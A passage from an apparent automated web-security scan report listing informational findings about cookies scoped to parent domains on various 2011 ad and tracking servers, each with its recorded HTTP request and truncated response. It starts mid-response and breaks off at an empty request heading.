Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:30 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1539
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=300x250;click0=http://oascentral.bostonherald.com/
...[SNIP]...

11.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J7A|O1021J7F; expires=Tue, 17-Sep-13 01:00:28 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1510
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/R
...[SNIP]...

11.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:27 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J7A; expires=Tue, 17-Sep-13 01:00:27 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript

document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

11.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O20226Kk; expires=Tue, 17-Sep-13 01:02:10 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.co
...[SNIP]...

11.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:11 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; expires=Tue, 17-Sep-13 01:02:11 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3106
Content-Type: application/x-javascript

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

11.90. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F&srcUrl=http%3A%2F%2Fwww.tmz.com%2Frss.xml&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=42206&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2&apv=false&rand=0.5065516342874616&sig=ot4zziHw HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=7a957d2b-640c-464a-8acd-8219f3607c99; tick=1316220936567; _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; _lvd2="eMOLTpv1no2amRCwbsQHJs5ztY1Fx+rEq8YUDxVG3BP6hVox5+F4+/M7CxYsJDnxTURpOGo6ZNkZw69B7h6E1sMF0XSBEZRLE75RDxSwUMqkfVlejxXOILIvcogbdib9HJJKMWdu3/A="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-6a9250000f8bdf31c8744c5bafc327c0="ZzAE/ktjesdeNFlXZ49FMhJVhafYPcPgLkUrQgKyP5dRrm2fnBRV2fSb/IdwA62N3ZxR/ggt50glYhkt69YxgNxTpgOHGlPC+xoCSjlRu8m0a3QZy00XGKvEjfibUWU69qJMoHFHxrJ5WOXcO9UcZQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1316220942842; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 13-Oct-2012 00:55:42 GMT; Path=/
Set-Cookie: _lvd2="PHPHrMMi4tB/TUzMDhNLuExtgrPUidZw2SkL41O19PL40iJ3cmuxL0CBz/AZPclyarqHKgLRZADwwyrf9Wxp503sC1vv7gThts/kVuXGq+6RePDwdpIv9I9eUye8TAoxesWFaLltsC0="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Fri, 23-Sep-2011 13:43:42 GMT; Path=/
Set-Cookie: _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 13-Oct-2012 00:55:42 GMT; Path=/
Set-Cookie: recs-6a9250000f8bdf31c8744c5bafc327c0="WOCZPPRgUVeQ3XCS2OoI48rf6g9SSjSCZlMhWyZJP/HjJ1nS2BO6WvFWNYQF78qoU+fNRUM+rQBZCc9A1uQeXHxeY8GsogNrScHQXkaR7ugqy2ogff13YSmXftEP5JyF9XVu3bYtlRJ5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 17-Sep-2011 01:00:42 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:55:42 GMT
Content-Length: 8887

outbrain_rater.returnedOdbData({'response':{'exec_time':36,'status':{'id':0,'content':'Request succeeded'},'request':{'widgetJsId':'AR_1','did':'231534154','req_id':'da23b34cfa8657c71e50520363d1bbbe'}
...[SNIP]...

11.91. http://omg.yahoo.com/photos/what-were-they-thinking/5203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /photos/what-were-they-thinking/5203

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /photos/what-were-they-thinking/5203 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:58 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: B=8942vl5777rt6&b=3&s=hu; expires=Tue, 16-Sep-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 135006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head profile="http://purl.org/NET/erdf/profile">

   <link rel="schema.celeb" href="http://omg.yahoo.co
...[SNIP]...

11.92. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.bradsdeals.com%2Fdealsoftheday%2Fsubscribe%2Fb%3Ftid%3D306656%26s%3Dadcom%7Cdisplay%7Ccomscore55-300redmixr-b%26utm_source%3Dadcom%26utm_medium%3Ddisplay%26utm_content%3D300redmixr-b%26utm_campaign%3Dcomscore55&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1316239546152&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:36:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Fri, 16 Dec 2011 01:36:55; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=2e1725dcdf2570d7;path=/';
document.cookie = '__csv=2a31db5320bf2a6b|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('a71917903cb81aa6'!='1'
...[SNIP]...

11.93. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=tOVyHE2zjqa_Ydc52bbPPZZwvhbYx5rMzWj3CcHWYCPg1CYfDyCzrunutgyaAqKDpg8RNvGAjmTSOdO0dh87wg&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15228%7C15234%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Thu, 15-Mar-2012 01:10:21 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1311898&t=2
Content-Length: 0
Date: Sat, 17 Sep 2011 01:10:21 GMT


11.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8z/ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27330&s=27331
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15228%7C15234%7C15228%7C15228%7C15231; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Thu, 15-Mar-2012 01:00:32 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 01:00:31 GMT

GIF89a.............!.......,...........D..;

11.95. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653? HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://bit.ly/n8AAWP
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:35:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 137
Date: Sat, 17 Sep 2011 01:35:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:35:29 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://bit.ly/n8AAWP">here</a>.</h2>
</body></html>

11.96. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=11415325&rk1=4961111&rk2=1316239725.757&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:07:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:07:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:07:20 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

11.97. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

